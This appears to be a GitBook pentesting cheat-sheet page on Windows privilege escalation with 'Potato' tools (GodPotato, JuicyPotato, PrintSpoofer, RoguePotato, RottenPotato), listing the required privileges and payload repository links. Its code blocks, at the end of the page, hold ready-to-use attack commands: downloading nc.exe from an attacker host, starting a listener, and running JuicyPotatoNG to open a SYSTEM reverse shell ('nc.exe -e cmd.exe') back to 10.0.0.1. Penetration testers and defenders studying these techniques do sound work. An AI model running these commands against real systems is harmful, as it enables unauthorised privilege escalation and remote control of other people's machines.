AD Privilege Escalation
Ctrlk
  • Iperius Backup Service Privilege Escalation
  • ManageEngine ADSelfService Plus PrivEsc
  • Mimikatz
  • Outlook Reminder Privilege Escalation
  • UAC Windows Privilege Escalation
  • Windows PrivEsc with Kerberos
  • Windows PrivEsc with LocalPotato
  • Windows PrivEsc with Registry Keys
  • Windows PrivEsc with RemotePotato
  • Windows PrivEsc with SeBackupPrivilege
  • Windows PrivEsc with Unquoted Service Path
  • Windows Privilege Escalation
  • Windows Pivoting
  • AD CS (Active Directory Certificate Services) Pentesting
  • Dumping Windows Password Hashes
  • WSL Pentesting
  • Windows Memory Dump Analysis
  • Windows Remote Code Execution from Linux
  • Windows XML EventLog (EVTX)
  • M365 (Microsoft Office 365) Pentesting
  • Microsoft Outlook Message (.msg)
  • Microsoft Word Pentesting
  • Reading OneDrive Logs
Powered by GitBook
Page cover
On this page

Windows PrivEsc with LocalPotato

GodPotato

Required Privileges

  • SeImpersonatePrivilege

Payloads

  • https://github.com/BeichenDream/GodPotato

GodPotato -cmd "cmd /c whoami"
Copied!

JuicyPotato

Required Privilege

  • SeImpersonatePrivilege or SeAssignPrimaryToken

Payloads

  • https://github.com/antonioCoco/JuicyPotatoNG

  • https://github.com/ohpe/juicy-potato

Before exploiting, we need to upload nc.exe (it is available from here) to the target machine.

Next start a listener in local machine.

Then execute JuicyPotato in target machine.

PrintSpoofer

Required Privilege

  • SeImpersonatePrivilege

Payloads

  • https://github.com/dievus/printspoofer

RoguePotato

Required Privilege

  • SeImpersonatePrivilege

Payloads

  • https://github.com/antonioCoco/RoguePotato

RottenPotato

Required Privilege

  • SeImpersonatePrivilege

Payloads

  • https://github.com/breenmachine/RottenPotatoNG

References

  • https://jlajara.gitlab.io/Potatoes_Windows_Privesc

  • https://github.com/decoder-it/LocalPotato

  • https://www.localpotato.com/localpotato_html/LocalPotato.html

  • https://tryhackme.com/room/localpotato

  • https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer

  • https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

PreviousWindows PrivEsc with KerberosNextWindows PrivEsc with Registry Keys

Last updated 2 years ago

  • GodPotato
  • JuicyPotato
  • PrintSpoofer
  • RoguePotato
  • RottenPotato
  • References
Invoke-WebRequest -Uri http://10.0.0.1:8000/nc.exe -OutFile c:\Temp\nc.exe
Copied!
nc -lvnp 4444
Copied!
JuicyPotatoNG.exe -t * -p "c:\Temp\nc.exe" -a "10.0.0.1 4444 -e cmd.exe"
Copied!
PrintSpoofer.exe -i -c cmd
Copied!